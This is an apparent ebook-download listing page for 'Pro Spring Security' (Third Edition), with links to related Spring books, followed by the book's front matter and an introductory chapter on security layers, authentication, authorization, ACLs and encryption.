100% found this document useful (1 vote)

58 views

Pro Spring Security: Securing Spring Framework 6 and Boot 3–based Java Applications, Third Edition Massimo Nardone pdf download

The document provides information about various ebooks related to Spring Framework 6 and Spring Boot 3, including titles like 'Pro Spring Security' and 'Beginning Spring Data.' It contains links to download these books and highlights their relevance for developers working with Java applications. Additionally, it includes details about the authors and copyright information for the publications.

Uploaded by

kebromquitio

Available Formats

Download as PDF, TXT or read online on Scribd

100% found this document useful (1 vote)

58 views

Pro Spring Security: Securing Spring Framework 6 and Boot 3–based Java Applications, Third Edition Massimo Nardone pdf download

Uploaded by

kebromquitio

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 86

Visit https://ebookmass.

com to download the full version and

browse more ebooks or textbooks

Pro Spring Security: Securing Spring Framework 6

and Boot 3–based Java Applications, Third Edition
Massimo Nardone

_ Press the link below to begin your download _

https://ebookmass.com/product/pro-spring-security-securing-
spring-framework-6-and-boot-3-based-java-applications-third-
edition-massimo-nardone/

Access ebookmass.com now to download high-quality

ebooks or textbooks
We believe these products will be a great fit for you. Click
the link to download now, or visit ebookmass.com
to discover even more!

Beginning Spring Data: Data Access and Persistence for

Spring Framework 6 and Boot 3 Andres Sacco

https://ebookmass.com/product/beginning-spring-data-data-access-and-
persistence-for-spring-framework-6-and-boot-3-andres-sacco/

Practical Spring LDAP: Using Enterprise Java-Based LDAP in

Spring Data and Spring Framework 6 2nd Edition Balaji
Varanasi
https://ebookmass.com/product/practical-spring-ldap-using-enterprise-
java-based-ldap-in-spring-data-and-spring-framework-6-2nd-edition-
balaji-varanasi/

Practical Spring LDAP: Using Enterprise Java-Based LDAP in

Spring Data and Spring Framework 6 2nd Edition Varanasi
Balaji
https://ebookmass.com/product/practical-spring-ldap-using-enterprise-
java-based-ldap-in-spring-data-and-spring-framework-6-2nd-edition-
varanasi-balaji/

Pro Spring 6: An In-Depth Guide to the Spring Framework,

6th Edition Iuliana Cosmina

https://ebookmass.com/product/pro-spring-6-an-in-depth-guide-to-the-
spring-framework-6th-edition-iuliana-cosmina/
Pro Spring 6 with Kotlin: An In-depth Guide to Using
Kotlin APIs in Spring Framework 6 1st Edition Peter Späth

https://ebookmass.com/product/pro-spring-6-with-kotlin-an-in-depth-
guide-to-using-kotlin-apis-in-spring-framework-6-1st-edition-peter-
spath/

Beginning Spring Boot 3: Build Dynamic Cloud-Native Java

Applications and Microservices - Second Edition K. Siva
Prasad Reddy
https://ebookmass.com/product/beginning-spring-boot-3-build-dynamic-
cloud-native-java-applications-and-microservices-second-edition-k-
siva-prasad-reddy/

Spring 6 Recipes: A Problem-Solution Approach to Spring

Framework Marten Deinum

https://ebookmass.com/product/spring-6-recipes-a-problem-solution-
approach-to-spring-framework-marten-deinum/

Hacking with Spring Boot 2.3: Reactive Edition

https://ebookmass.com/product/hacking-with-spring-boot-2-3-reactive-
edition/

Learn Microservices with Spring Boot 3 3rd / converted

Edition Moises Macero Garcia

https://ebookmass.com/product/learn-microservices-with-spring-
boot-3-3rd-converted-edition-moises-macero-garcia/
Pro Spring Security
Securing Spring Framework 6
and Boot 3-based Java Applications
Third Edition

Massimo Nardone
Carlo Scarioni
Pro Spring Security: Securing Spring Framework 6 and Boot 3–based Java
Applications, Third Edition
Massimo Nardone Carlo Scarioni
HELSINKI, Finland Surbiton, UK

ISBN-13 (pbk): 979-8-8688-0034-4 ISBN-13 (electronic): 979-8-8688-0035-1

https://doi.org/10.1007/979-8-8688-0035-1

Copyright © 2024 by Massimo Nardone, Carlo Scarioni

This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the
material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation,
broadcasting, reproduction on microfilms or in any other physical way, and transmission or information
storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now
known or hereafter developed.
Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with
every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an
editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the
trademark.
The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not
identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to
proprietary rights.
While the advice and information in this book are believed to be true and accurate at the date of publication,
neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or
omissions that may be made. The publisher makes no warranty, express or implied, with respect to the
material contained herein.
Managing Director, Apress Media LLC: Welmoed Spahr
Acquisitions Editor: Melissa Duffy
Development Editor: Laura Berendson
Coordinating Editor: Gryffin Winkler
Copy Editor: Kim Burton
Cover designed by eStudioCalamar
Cover image by Manuel Torres Garcia from Pixabay
Distributed to the book trade worldwide by Apress Media, LLC, 1 New York Plaza, New York, NY 10004,
U.S.A. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer-sbm.com, or visit
www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer
Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a Delaware corporation.
For information on translations, please e-mail booktranslations@springernature.com; for reprint,
paperback, or audio rights, please e-mail bookpermissions@springernature.com.
Apress titles may be purchased in bulk for academic, corporate, or promotional use. eBook versions and
licenses are also available for most titles. For more information, reference our Print and eBook Bulk Sales
web page at http://www.apress.com/bulk-sales.
Any source code or other supplementary material referenced by the author in this book is available to
readers on GitHub (https://github.com/Apress). For more detailed information, please visit https://www.
apress.com/gp/services/source-code.
Paper in this product is recyclable
I would like to dedicate this book to the memory of my beloved late
mother, Maria Augusta Ciniglio. Thanks, Mom, for all the great things
you have taught me, for making me a good person, for making me
study to become a computing scientist, and for the great memories you
left me. You will be loved and missed forever. I love you, Mom. RIP.
—Massimo
Table of Contents
About the Authors�� ix

About the Technical Reviewer�� xi

Acknowledgments�� xiii

Introduction��xv

Chapter 1: The Scope of Security�� 1

The Network Security Layer�� 4
The Operating System Layer�� 5
The Application Layer�� 5
Authentication�� 6
Authorization�� 7
ACLs�� 9
Authentication and Authorization: General Concepts�� 9
What to Secure�� 14
Additional Security Concerns�� 15
Java Options for Security�� 17
Summary�� 19

Chapter 2: Introducing Spring Security�� 21

What Is Spring Security?�� 21
Where Does Spring Security Fit In?�� 23
Spring Security Overview�� 26
What Is Spring Boot?�� 28
Spring Framework 6: A Quick Overview�� 29
JDK 17+ and Jakarta EE 9+ Baseline�� 30
General Core Revision�� 30

v
Table of Contents

Core Container�� 30
Data Access and Transactions�� 31
Spring Messaging�� 32
General Web Revision�� 32
Spring MVC�� 32
Spring WebFlux�� 32
Observability�� 33
Pattern Matching�� 33
Testing�� 34
Dependency Injection�� 34
Aspect-Oriented Programming�� 36
What’s New in Spring Security 6?�� 38
Summary�� 44

Chapter 3: Setting up the Scene�� 45

Setting up the Development Environment�� 45
Creating a New Java Web Application Project�� 52
Adding Spring Security 6 to the Java Project�� 57
Spring Security 6 Source�� 58
Configuring the Spring Security 6 Web Project�� 65
Summary�� 74

Chapter 4: Spring Security Architecture and Design�� 75

What Components Make up Spring Security?�� 75
The 10,000-Foot View�� 75
The 1,000-Foot View�� 76
The 100-Foot View�� 77
Good Design and Patterns in Spring Security�� 116
Strategy Pattern�� 117
Decorator Pattern�� 117
SRP�� 118
DI�� 118
Summary�� 118
vi
Table of Contents

Chapter 5: Web Security�� 121

Configuring the new Spring Security 6 Project�� 126
The Special URLs�� 142
Custom Login Form�� 143
Basic HTTP Authentication�� 150
Digest Authentication�� 152
Remember-Me Authentication�� 155
Logging Out�� 158
Session Management�� 161
Summary�� 167

Chapter 6: Configuring Alternative Authentication Providers�� 169

LDAP Authentication�� 185
Using an Embedded LDAP�� 186
X.509 Authentication�� 198
OAuth 2.0�� 200
JSON Web Token�� 201
Spring WebSocket�� 202
Java Authentication and Authorization Service�� 203
Central Authentication Service�� 203
Summary�� 204

Chapter 7: Business Object Security with ACLs�� 205

ACL Key Concepts�� 205
Summary�� 210

Chapter 8: Open Authorization 2.0 (OAuth 2.0) and Spring Security�� 211
An Introduction to OAuth 2.0�� 211
OAuth 2.0 Security�� 213
Integrating OAuth 2.0 with Spring Security�� 214
OAuth 2.0 Login�� 217
Summary�� 238

vii
Table of Contents

Chapter 9: JSON Web Token (JWT) Authentication�� 239

The REST API�� 239
Introduction to JSON Web Token�� 242
Summary�� 279

Index�� 281

viii
About the Authors
Massimo Nardone has more than 27 years of experience
in information and cybersecurity for IT/OT/IoT/IIoT,
web/mobile development, cloud, and IT architecture. His
true IT passions are security and Android. He has been
programming and teaching how to program with Android,
Perl, PHP, Java, VB, Python, C/C++, and MySQL for more
than 27 years. He holds an MSc degree in computing
science from the University of Salerno, Italy. Throughout
his working career, he has held various positions, starting
as a programming developer, then security teacher, PCI
QSA, auditor, assessor, lead IT/OT/SCADA/SCADA/
cloud architect, CISO, BISO, executive, program director, and OT/IoT/IIoT security
competence leader.
In his last working engagement, he worked as a seasoned cyber and information
security executive, CISO and OT, IoT and IIoT Security competence Leader, helping
many clients to develop and implement Cyber, Information, OT, and IoT security
activities.
His technical skills include security, OT/IoT/IIoT, Android, cloud, Java, MySQL,
Drupal, Cobol, Perl, web and mobile development, MongoDB, D3, Joomla!, Couchbase,
C/C++, WebGL, Python, Pro Rails, Django CMS, Jekyll, and Scratch. He has served as a
visiting lecturer and exercises supervisor at the Helsinki University of Technology (Aalto
University) Networking Laboratory.
He stays current with industry and security trends and is a board member of the
ISACA Finland chapter, ISF, the Nordic CISO Forum, and the Android Global Forum.
He holds four international patents (PKI, SIP, SAML, and Proxy areas). He currently
works as a cybersecurity freelancer for IT/OT and IoT. Massimo has reviewed more than
55 IT books for different publishers and has coauthored Pro JPA 2 in Java EE 8 (Apress,
2018), Beginning EJB in Java EE 8 (Apress, 2018), and Pro Android Games (Apress, 2015).

ix
About the Authors

Carlo Scarioni is a passionate software developer, motivated

by learning and applying innovative and interesting software
development tools, techniques, and methodologies. He
has worked in the field for more than 18 years and moved
across multiple languages, paradigms, and subject areas.
He also has many years of experience working with Java
and its ecosystem. He has been in love with Spring since
the beginning, and he is fascinated by how Spring allows
building complex applications out of discrete, focused
modules and by the clever use of decorators to add cross-
cutting functionalities. He has worked mostly with data
engineering solutions in the last few years. He has been creating solutions around the
use of modern data stack components in cloud environments while at the same time
developing software using technologies such as Spark, Python, and others.

x
About the Technical Reviewer
Mario Faliero is a telecommunication engineer and
entrepreneur. He has more than ten years of experience in
radio frequency hardware engineering. Mario has extensive
experience in numerical coding, using scripting languages
(MatLab, Python) and compiled languages (C/C++, Java).
He has been responsible for developing electromagnetic
assessment tools for space and commercial applications.
Mario received his master’s degree from the University
of Siena.

xi
Acknowledgments
Many thanks go to my wonderful family for supporting me while I was working on this
book. Luna, Leo, and Neve, you are the most beautiful reason of my life.
I want to thank my beloved late mother, Maria Augusta Ciniglio, who always
supported and loved me so much. I will love and miss you forever, my dearest mom.
Thanks to my beloved father, Giuseppe, and my brothers, Mario and Roberto, for
your endless love and for being the best dad and brothers in the world.
Many thanks to Melissa Duffy for giving me the opportunity to work as a writer on
this book, Shonmirin P. A. for doing such a great job during the editorial process and
supporting me, and Laura Berendson, development editor, for helping me to make it a
better book.
—Massimo Nardone

xiii
Introduction
Denying the impact of the Spring Framework in the Java world would be simply
impossible. Spring has brought so many advantages to Java developers that we could say
it has made us all better developers.
The previous version of this book utilized Spring Security 5. Therefore, in this new
edition of the book, it is very important to note the most important changes from version
5 to version 6.
Spring Framework 6.0 was released on November 16, 2022. It came with a Java
17+ baseline and a move to Jakarta EE 9+ (in the Jakarta namespace), focusing on
the recently released Jakarta EE 10 APIs such as Servlet 6.0 and JPA 3.1. Spring’s
current version’s core building blocks of dependency injection and aspect-oriented
programming widely apply to many business and infrastructure concerns. Certainly,
application security can benefit from these core functionalities. Even in version 6, Spring
Security is an application-level security framework built on top of the powerful Spring
Framework that deals mainly with the core security concepts of authentication and
authorization, which, also in version 6, are some of the fundamental functionalities of
Spring Security.
Spring Security aims to be a full-featured security solution for your Java applications.
Although its focus is on web applications and the Java programming language, you will
see that it goes beyond these two domains.
Because there are new things in the version, the baseline for Spring Boot 3 and
Spring Security 6 is Java 17.
Also, the WebSecurityConfigurerAdapter class to configure security settings was
deprecated in version 6, using a more component-based approach and creating a bean
of type SecurityFilterChain.
AuthorizeRequests was also deprecated and replaced with authorizeHttpRequests,
and in Spring Security 6, AntMatcher, MvcMatcher, and RegexMatcher were deprecated
and replaced by requestMatchers or securityMatchers for path-based access control.
Also, in version 6, some updates were done using OAuth 2.0 and SAML 2.0.

xv
Introduction

In writing this book, we wanted to expose some of Spring Security’s internal works
along with standard explanations of how to use certain features. The idea is to teach
beyond the basics of how to do something in particular and instead focus on the
plumbing inside the framework. This is the best way to learn something: seeing how it
is built in the core. That’s not to say that the book doesn’t cover basic setups and gives
quick, practical advice on using the framework because it certainly does. The point is
that instead of saying, “Use this to do that,” we say, “This works like this… and this allows
you to….” This is a point of view that only tools like Spring can afford (because they are
open source).
With that said, we suggest that the best way to use this book is to have the Spring
Security source code checked out on your computer and go through the examples
with both the code from the book and the code from Spring Security itself. This will
help you understand each concept as it is introduced and teach more than one good
programming trick and good practice. We recommend this approach for studying
any software whenever you have the chance. If the source code is out there, grab it.
Sometimes, a couple of lines of code teach more than a thousand words. This book
primarily introduces Spring Boot 3, analyzes Spring Framework, and develops Java web
applications with Spring Security 6 and Java 17/20.
Also, Spring Security 6 supports many different authentication mechanisms, which
are introduced and developed in this book, including the H2 and PostgreSQL databases,
LDAP, X.509, OAuth 2.0, JWT, JAAS, and CAS.

Who This Book Is For

This book is written mainly for Java developers who use Spring in their work and need to
add security to their applications in a way that leverages Spring’s proven concepts and
techniques. The book will also be helpful to developers who want to add web-layer security
to their applications, even if those applications are not fully Spring-powered at their core.
The book assumes you have knowledge of Java and some of its tools and libraries, such
as Servlet, Maven, OAuth 2.0, and JWT. It also assumes that you know what you want to
use security for and in what context you want to use it. This means, for example, we won’t
explain protocols like LDAP in depth; instead, we’ll concentrate on showing you how to
integrate Spring Security with an LDAP user store. An in-depth knowledge of Spring is not
essential because many of the concepts are introduced as we go along, but the more you
understand about Spring, the more likely you are to get out of this book.

xvi
Introduction

How This Book Is Structured

The book is divided into nine chapters that embody a progressive study of Spring
Security. Starting from a summary of basic applications and an explanation of how the
framework is structured, the content moves on to more advanced topics, such as using
Spring Security in different JVM languages. The book follows a sequence corresponding
to how this framework is normally used in real life.
The chapters in the book cover the following.
• Chapter 1 introduces security in general and how to approach
security problems at the application level.

• Chapter 2 introduces Spring Security 6, how to use it, when to use it,
and its security functionalities.

• Chapter 3 introduces Spring Security with a simple example

application that secures web access at the URL level.

• Chapter 4 provides a full introduction to the architecture of Spring

Security, including the main components and how they interact with
each other.

• Chapter 5 gives in-depth coverage of the web-layer security options

available in Spring Security.

• Chapter 6 covers a wide array of authentication providers, including

H2 DB, LDAP, and JASS, which can be plugged into Spring Security.

• Chapter 7 covers access control lists (ACLs), which are used to

secure individual domain objects, and how they fit into the general
security concerns.
• Chapter 8 explains how to develop an application using Open
Authorization 2.0 (OAuth 2.0) Login and Spring Security
Customization.

• Chapter 9 shows how to integrate Spring Security into JSON Web

Token (JWT) authentication.

xvii
Introduction

Prerequisites
The examples in this book are all built with Java 17 and Maven 3.9.2. The latest Spring
versions are used if possible. Spring Security 6 is the version used throughout the book.
Tomcat Web Server 10 is used for the different web applications in the book, mainly
through its Maven plugin. The laptop is a ThinkPad Yoga 360 with 8 GB of RAM. All the
projects were developed using IntelliJ IDEA Ultimate 2023.2.
You are free to use your own tools and operating system. Because everything is Java-
based, you should be able to compile your programs on any platform without problems.

Downloading the Code

Any source code or other supplementary material referenced by the author in this book
is available to readers on GitHub (https://github.com/Apress). For more detailed
information, please visit www.apress.com/gp/services/source-code.

Contacting the Authors

You are more than welcome to send us any feedback regarding this book or any other
subject we might help you with. You can contact Massimo Nardone via email at
massimonardonedevchannel@gmail.com and Carlo Scarioni via his blog at http://
cscarioni.blogspot.com, or you can send him email at carlo.scarioni@gmail.com.

xviii
CHAPTER 1

The Scope of Security

Security. It is an incredibly overloaded word in the IT, OT, and IoT world. It means so
many different things in many different contexts, but in the end, it is all about protecting
sensitive and valuable resources against malicious usage.
IT has many layers of infrastructure and code that can be subject to malicious
attacks, and arguably, you should ensure that all these layers get the appropriate levels of
protection.
In operational technology (OT), where generally the systems were isolated from
the external networks and operated independently, the increasing connectivity and
integration of OT systems with information technology (IT) networks and the Internet,
the risk of cyberattacks targeting these systems has significantly grown. OT security aims
to address these risks and protect against threats that could disrupt operations, cause
physical damage, or impact public safety.
In the Internet of Things (IoT), security refers to the measures and practices
implemented to protect the interconnected devices, networks, and data associated with
IoT systems, such as networks of physical objects or “things” embedded with sensors,
software, and connectivity to exchange data and perform various tasks. These objects
range from household appliances and wearable devices to industrial machinery and
infrastructure. Given the proliferation of IoT devices and their increasing integration into
various domains, securing IoT systems is critical to mitigate potential risks and protect
the privacy, integrity, and availability of their data and services.
The growth of the Internet and the pursuit of reaching more people with our
applications have opened more doors to cyber criminals trying to access these
applications illegitimately.
It is also true that good care is not always taken to ensure that a properly secured set
of services is offered to the public. And sometimes, even when good care is taken, some
hackers are still smart enough to overcome security barriers that, superficially, appear
adequate.
The first step is to define a defense-in-depth strategy and security layers.

1
© Massimo Nardone, Carlo Scarioni 2024
M. Nardone and C. Scarioni, Pro Spring Security, https://doi.org/10.1007/979-8-8688-0035-1_1
Chapter 1 The Scope of Security

Defense in depth (also known as DiD) is a security strategy that involves

implementing multiple layers of defense to protect a system or network from
potential threats. It aims to provide a comprehensive and resilient security posture by
incorporating various security measures at different levels, such as physical, technical,
and administrative controls.
The defense-in-depth concept recognizes that no single security measure is fool-
proof, and relying on a single layer of defense can leave vulnerabilities. By employing
multiple layers, other layers can still provide protection even if one is breached or
compromised.
In practice, a defense-in-depth strategy can include a combination of measures such
as firewalls, intrusion detection systems, encryption, access controls, strong authentication
mechanisms, security awareness training, regular system updates and patching, network
segmentation, and physical security measures like locked doors and security cameras.
These layers collectively create a more robust and resilient security infrastructure.
The goal of a defense-in-depth strategy is to increase the difficulty for attackers,
making it harder for them to penetrate a system and move deeper into the network.
Requiring attackers to overcome multiple barriers increases the likelihood of detection
and mitigation, reducing the potential impact of a successful attack. Overall, it is a
proactive approach to security that emphasizes multiple layers of protection, reducing
the risk of successful attacks and minimizing the potential damage they can cause.
In general, a defense-in-depth strategy is a way to define how to develop the
cybersecurity of the IT infrastructure by defining how all the defensive mechanisms are
layered to protect and secure data and information. A failing or weak defense-in-depth
strategy might result from a cybersecurity attack on the IT infrastructure.
Let’s try to understand a bit more about defense-in-depth mechanisms. First, there
are three major controls.

• Physical controls are security measures that aim to protect the

physical infrastructure and assets. They include surveillance
cameras, access controls (such as locks and biometric systems),
perimeter fencing, security guards, and intrusion detection systems.

• Perimeter security focuses on securing the boundary between the

internal network and the external environment. It involves firewalls,
intrusion prevention systems (IPS), and demilitarized zones (DMZs)
to filter and monitor network traffic, control access, and prevent
unauthorized entry.

2
Chapter 1 The Scope of Security

• Network security measures aim to protect the internal network

infrastructure. They include technologies such as network
segmentation, virtual private networks (VPNs), intrusion detection
systems (IDS), and IPS to detect and prevent unauthorized access,
monitor network traffic, and detect and respond to potential threats.

• Identity and access management (IAM) controls ensure that only

authorized individuals can access systems and resources. This
includes strong authentication mechanisms like passwords, two-
factor authentication (2FA), multi-factor authentication, access
control policies, and privilege management to enforce least privilege
principles.

• Application security focuses on securing the software and

applications used within an organization. This involves
implementing secure coding practices, regular vulnerability
assessments and penetration testing, web application firewalls
(WAFs), and application-level authentication and authorization
mechanisms.

• Data encryption protects data by transforming it into a secure format

that can only be accessed with the correct decryption key. It is used
to secure data at rest (stored data) and in transit (data transmitted
over networks).

• Security monitoring and incident response involve continuous

monitoring of systems and networks, which is crucial to detecting
and responding to security incidents. This includes using security
information and event management (SIEM) tools, log analysis,
IDS, and incident response plans to promptly identify and mitigate
potential threats.

• Security awareness and training includes educating employees

and users about security best practices and potential threats is vital.
Regular security awareness training helps individuals understand
their role in maintaining a secure environment and enables them to
identify and report suspicious activities.

3
Chapter 1 The Scope of Security

By combining these major controls, organizations can establish a multi-layered

defense-in-depth security approach that provides and increases overall resilience
against various threats.
Figure 1-1 shows typical defense-in-depth mechanisms defining IT infrastructure
security layers.

Figure 1-1. Defense-in-depth mechanisms and IT infrastructure layers

The three major security layers in an IT infrastructure are the network, the operating
system (part of the endpoint security layer), and the application itself.

The Network Security Layer

The network security layer is probably the most familiar one in the IT world. When
people talk about IT security, they normally think of network-level security—in
particular, security that uses firewalls.
Even though people often associate security with the network level, this is only a
very limited layer of protection against attackers. Generally speaking, it can do no more
than defend IP addresses and filter network packets addressed to certain ports in certain
machines in the network.

4
Chapter 1 The Scope of Security

This is not enough in most cases, as traffic at this level is normally allowed to enter
the publicly open ports of your various exposed services without restriction. Different
attacks can be targeted at these open services, as attackers can execute arbitrary
commands that could compromise your security constraints. Tools like the popular nmap
(http://nmap.org/) can scan a machine to find open ports. Using such tools is an easy
first step in preparing an attack because well-known attacks can be used against such
open ports if they are not properly secured.
A very important part of the network-layer security, in the case of web applications,
is the use of Secure Sockets Layer (SSL) to encode all sensitive information sent along
the wire, but this is related more to the network protocol at the application level than to
the network physical level at which firewalls operate.

The Operating System Layer

The operating system layer is probably the most important one in the whole security
schema, as a properly secured operating system (OS) environment can at least prevent a
whole host machine from going down if a particular application is compromised.
If an attacker is somehow allowed to have unsecured access to the operating system,
they can basically do whatever they want—from spreading viruses to stealing passwords
or deleting your whole server’s data and making it unusable. Even worse, they could
take control of your computer without you even noticing and use it to perform other
malicious acts as part of a botnet. This layer can include the deployment model of the
applications since you need to know your operating system’s permission scheme to
ensure that you don’t give your applications unnecessary privileges over your machine.
Applications should run as isolated as possible from the other components of the host
machine.

The Application Layer

The primary focus of this book is on the application layer. The application security layer
refers to all the constraints you establish in your applications to make sure that only the
right people can do the right things when working through the application.

5
Chapter 1 The Scope of Security

Applications, by default, are open to countless avenues of attack. An improperly

secured application can allow an attacker to steal information from the application,
impersonate other users, execute restricted operations, corrupt data, gain access to the
operating system level, and perform many other malicious acts.
This book covers application-level security, which is the domain of Spring Security.
Application-level security is achieved by implementing several techniques, and there
are a few concepts that help you understand better what the book covers. They are
the main concerns that Spring Security addresses to provide your applications with
comprehensive protection against threats. The following three subsections introduce
authentication, authorization, and ACLs.

Authentication
Authentication is the process of verifying the identity of a user or entity attempting
to access an application. It ensures that the user is who they claim to be. Common
authentication methods include the following.

• Username and password: Users provide a unique username and

corresponding password.

• Multi-factor authentication (MFA): Users provide multiple forms of

identification, such as a password and a one-time verification code
sent to their mobile device.

• Biometric authentication: Users verify their identity using unique

physical characteristics, such as fingerprints, facial recognition, or
iris scans.

The authentication process allows an application to validate that a particular

user is who they claim they are. In the authentication process, a user presents the
application with information about herself (normally, a username and a password) that
no one else knows. The application takes this information and tries to match it against
the information stored—normally, in a database or LDAP1 (Lightweight Directory
Access Protocol) server. If the information the user provides matches a record in the
authentication server, the user is successfully authenticated. The application normally

1
LDAP is explained in some detail in Chapter 8, where various authentication providers are
covered.

6
Chapter 1 The Scope of Security

creates an internal abstraction representing this authenticated user in the system.

Figure 1-2 shows the authentication mechanism.

Figure 1-2. Simple, standard authentication mechanism

Authorization
Authorization determines what actions or resources a user can access within an
application. Once a user is authenticated, authorization mechanisms control their
permissions based on predefined rules and policies. This ensures that users can only
access the features and data they are authorized to use. Authorization can be role-based,
attribute-based, or rule-based.

• Role-based access control (RBAC): Users are assigned roles,

and permissions are granted based on those roles. For example, a
manager role may access certain administrative features, while a
regular user role may only access basic functionalities.

• Attribute-based access control (ABAC): Access is granted based

on specific attributes or characteristics of the user, such as job title,
department, or location.

7
Chapter 1 The Scope of Security

• Rule-based access control: Access control rules are defined based

on predefined conditions or criteria. For example, granting access
during specific timeframes or based on certain data conditions.

When a user is authenticated, that only means that the user is known to the system
and has been recognized by it. It doesn’t mean that the user is free to do whatever she
wants in said system. The next logical step in securing an application is determining
which actions the user can perform and which resources she can access. If the user
doesn’t have the proper permissions, she cannot carry out that particular action. This
is the work of the authorization process. In the most common case, the authorization
process compares the user’s set of permissions against the permissions required
to execute a particular action in the application, and if a match is found, access is
granted. On the other hand, if no match is found, access is denied. Figure 1-3 shows the
authorization mechanism.

Figure 1-3. Simple authorization process: the authenticated user tries to access a
secured resource

8
Chapter 1 The Scope of Security

ACLs
An access control list (ACL) manages access rights and permissions to specific resources
or objects within an application. It is typically used in conjunction with authorization.
An ACL defines who has access to a particular resource and what actions they can
perform on that resource. It consists of a list of users or groups and their corresponding
permissions (read, write, execute, etc.) for specific resources.
ACLs are part of the authorization process explained in the previous section. The key
difference is that ACLs normally work at a finer-grained level in the application. ACLs
are a collection of mappings between resources, users, and permissions. With ACLs, you
can establish rules like “User John has administrative permission on the blog post X” or
“User Luis has read permission on blog post X.” You can see the three elements: user,
permission, and resource. Figure 1-3 shows how ACLs work; they are just a special case
of the general authorization process.

Authentication and Authorization: General Concepts

This section introduces and explains fundamental security concepts that you will come
across frequently in the book.

• User: The first step in securing a system from malicious attackers is

identifying legitimate users and allowing access to them alone. User
abstractions are created in the system and given their own identity.
They are the users that are later allowed to use the system.

• Credentials: Credentials are the way a user proves who they are.
Normally, in the shape of passwords (certificates are also a common
way of presenting credentials), they are data that only the owner of
it knows.

• Role: In an application security context, a role can be seen as a logical

grouping of users. This logical grouping is normally done so the
grouped users share a set of permissions in the application to access
certain resources. For example, all users with the admin role have the
same access and permissions to the same resources. Roles are a way
to group permissions to execute determined actions, making users
with those roles inherit such permissions.

9
Chapter 1 The Scope of Security

• Resource: Any part of the application you want to access that needs
to be properly secured against unauthorized access—for example, a
URL, a business method, or a particular business object.

• Permissions: The access level needed to access a particular

resource. For example, two users may be allowed to read a particular
document, but only one can write to it. Permissions can apply to
individual users or users that share a particular role.

• Encryption: It allows you to encrypt sensible information (normally

passwords, but it can be something else, like cookies) to make
it incomprehensible to attackers even if they get access to the
encrypted version. The idea is that you never store the plain text
version of a password but instead store an encrypted version so that
nobody but the owner knows the original one.

The following describes types of encryption algorithms.

• One-way encryption: These algorithms, referred to as hashing

algorithms, take an input string and generate an output number
known as the message digest. This output number cannot be
converted back into the original string. This is why the technique is
referred to as one-way encryption.

For example, let’s suppose the requesting client encrypts a string and
sends the encrypted string to the server. The server may have access
to the original information from a previous registration process, for
example, and if it does, it can apply the same hash function. Then, it
compares the output from this hashing to the value sent by the client.
If they match, the server validates the information.

Figure 1-4 shows this scheme. Usually, the server doesn’t even need
the original data. It can simply store the hashed version and then
compare it with the incoming hash from the client.

10
Chapter 1 The Scope of Security

Figure 1-4. One-way encryption or hashing

• Symmetric encryption: These algorithms provide two functions:

encrypt and decrypt. A string of text is converted into an encrypted
form and then can be converted back to the original string. In this
scheme, a sender and a receiver share the same keys to encrypt and
decrypt messages on both ends of the communication. One problem
with this scheme is how to share the key between the endpoints of
the communication. A common approach is to use a parallel secure
channel to send the keys.

• Key: Symmetric encryption uses a single shared secret key for

encryption and decryption. This means that both the sender and
the recipient use the same key.

11
Chapter 1 The Scope of Security

• Speed: Symmetric encryption algorithms are generally faster and

more efficient than asymmetric encryption algorithms.

• Use case: Symmetric encryption is commonly used for securing

large amounts of data, such as file encryption or secure
communication between two parties who already share a
secret key.

• Figure 1-5 shows symmetric encryption at work.

Figure 1-5. Symmetric encryption: the two endpoints share the same encryption/
decryption key

• Public key cryptography: These techniques are based on

asymmetric cryptography. In this scheme, a different key is used
for encryption than for decryption. These two keys are referred
to as the public key, which is used to encrypt messages, and the
private key, which is used to decrypt messages. The advantage of
this approach over symmetric encryption is that there is no need
to share the decryption key, so no one but the intended receiver of
the information can decrypt the message. The following describes a
normal scenario.

• The intended recipient of messages shares her public key with

everyone interested in sending information to her.

• A sender encrypts the information with the receiver’s public key

and sends a message.

12
Chapter 1 The Scope of Security

• The receiver uses her private key to decrypt the message.

• No one else can decrypt the message because they don’t have the
receiver’s private key.

The following defines the key, speed, and use case for asymmetric or PKI encryption.

• Key: Asymmetric encryption uses a pair of keys—a public key and

a private key. The public key is freely available to anyone, while the
owner keeps the private key secret.

• Encryption and decryption: The public key is used for encryption,

while the private key is used for decryption. This means the data
encrypted with the public key can only be decrypted with the
corresponding private key.

• Security: Asymmetric encryption provides a higher level of security

because the private key is not shared or transmitted.

• Use case: Asymmetric encryption is commonly used for secure key

exchange, digital signatures, and secure communication between
parties who don’t have a pre-shared secret key.

Figure 1-6 shows the public key cryptography scheme.

Figure 1-6. Public key cryptography

The use of encryption achieves, among other things, two other security goals.
• Confidentiality: Potentially sensitive information belonging to one
user or group of users should be accessible only to this user or group.
Encryption algorithms are the main helpers in achieving this goal.

13
Chapter 1 The Scope of Security

• Integrity: Data sent by a valid user shouldn’t be altered by a third

entity on its way to the server or in its storage. This is normally
accomplished through one-way cryptographic algorithms that
make it almost impossible to alter an input and produce a corrupted
message whose encrypted hash is the same as the original message
(thus deceiving the receiver into thinking it is valid).

In practice, a combination of symmetric and asymmetric encryption is often used

in hybrid encryption. In hybrid encryption, symmetric encryption encrypts the actual
data, while the symmetric key is encrypted using the recipient’s public key (asymmetric
encryption). This approach combines the efficiency of symmetric encryption with the
security and flexibility of asymmetric encryption.

What to Secure
Not every part of the application requires a strong security model or any security. If, for
example, one part of your application is supposed to serve static content to everyone
interested, you can simply serve this content. There probably are no security concerns to
handle here.
Anyway, when starting to work on a new application, you should think about the
security constraints that your application will have. You should think about concerns like
those in the following list and whether they apply to your particular use case.

• Identity management: Your application will likely need to establish

the users’ identities. Usually, your application will do different
things for different users, so you need a way to associate users with
certain functionality. You also need to protect each user’s identity
information so it can’t be compromised.

• Secured connections: In an Internet environment, where anyone

in the world can potentially access your system and eavesdrop on
other users accessing your system, you most likely want to secure the
communication of sensitive data using some kind of transport layer
